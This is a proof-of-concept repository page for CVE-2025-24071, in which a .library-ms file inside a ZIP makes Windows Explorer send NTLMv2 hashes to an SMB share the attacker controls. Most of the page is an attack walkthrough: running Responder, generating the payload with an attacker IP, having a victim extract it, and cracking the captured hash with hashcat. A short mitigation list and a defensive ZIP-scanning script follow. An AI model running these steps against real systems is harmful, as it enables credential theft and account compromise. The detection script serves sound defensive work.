CVE-2025-24071 PoC — Microsoft Windows File Explorer Information Disclosure Vulnerability

Associated Vulnerability
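Title: Microsoft Windows File Explorer Information Disclosure Vulnerability (CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft (USA). Microsoft Windows File Explorer contains an information disclosure vulnerability. An attacker can exploit this vulnerability to obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server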
Description
CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File
Readme
# CVE-2025-24071-POC-NTLMHashDisclosure
- Triggers automatic SMB authentication to an attacker-controlled share.
- No interaction required — Windows Explorer initiates this NTLM authentication automatically.
- Results in NTLMv2 hash leakage (information disclosure).
- Affects all versions of Windows 10/11, especially Windows 11 23H2.

## Set Up the Attacker Environment

> sudo apt update && sudo apt install responder -y

Start Responder 

> sudo responder -I eth0

## Run the Exploit Script

Install required Python module
> pip install colorama

> python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

This will generate:

- testpayload.library-ms
- testpayload.zip

## Test on the Victim Machine

1. Transfer testpayload.zip to the Windows 11 test machine.
2. Extract the ZIP using Windows File Explorer.

This triggers Windows to try accessing the SMB path, leaking the NTLM hash.

## Capture the Hash
> responder -I eth0

![Image](https://github.com/user-attachments/assets/facabd32-99d1-4c73-860f-5f77b734c3b8)


## Prepare the Hash File

Create a hash.txt file containing the captured hash:
>victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

## Choose a Wordlist

The most common choice is rockyou.txt.

## Run Hashcat

>hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

![Image](https://github.com/user-attachments/assets/9b0a9d7c-793f-4fd0-aa5a-0a2032a85c28)


## Mitigation

- Block outbound SMB (TCP 445) at firewalls.
- Disable automatic authentication to untrusted SMB shares (group policy).
- Monitor for .library-ms file extraction and SMB connections.
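
One way to act on the monitoring item above, as an added example that is not part of the PoC repository: inspect a ZIP archive before it is extracted and report `.library-ms` members whose content names a remote host. The function names, the size limit and the sample archive are assumptions constructed for this illustration; where the check runs (mail gateway, download scanner) is left to the deployment.

```python
import io
import re
import zipfile

# \\host\share UNC paths, or file://host/ URLs with a non-empty host part.
REMOTE_REF = re.compile(
    r'\\\\([A-Za-z0-9._-]+)\\[^\s<"]+|file://([A-Za-z0-9._-]+)/', re.IGNORECASE)

def _decode(raw: bytes) -> str:
    # Library files are XML; honour a UTF-16 BOM so encoding does not hide a match.
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")

def scan_zip(data: bytes, max_member_bytes: int = 1_000_000):
    """Return (member, remote_host) pairs for .library-ms members naming a remote host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            if info.file_size > max_member_bytes:  # do not inflate huge members
                findings.append((info.filename, "<oversized, not inspected>"))
                continue
            text = _decode(zf.read(info))
            hosts = {(m.group(1) or m.group(2)).lower() for m in REMOTE_REF.finditer(text)}
            findings.extend((info.filename, h) for h in sorted(hosts))
    return findings

def build_sample_zip() -> bytes:
    """Constructed test archive; the members are fragments, not complete library files."""
    members = {
        "docs/report.library-ms": "<url>\\\\192.0.2.10\\share</url>",
        "local.library-ms": "<url>C:\\Users\\Public\\Documents</url>",
        "notes.txt": "\\\\192.0.2.10\\share",  # wrong extension, ignored
        "u16.library-ms": "<url>\\\\fileserver.example\\docs</url>".encode("utf-16"),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()

if __name__ == "__main__":
    for member, host in scan_zip(build_sample_zip()):
        print(f"ALERT {member}: references remote host {host}")
```

A finding is a reason to quarantine the archive or to compare the host against the organisation's known file servers; internal shares referenced by legitimate library files will also appear.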






File Snapshot

    [4.0K] /data/pocs/64449e92cd1a22514538fdc859b22d2202aa0e92
    ├── [4.0K] POC
    │   └── [3.4K] CVE-2025-24071.py
    └── [1.6K] README.md

    1 directory, 2 files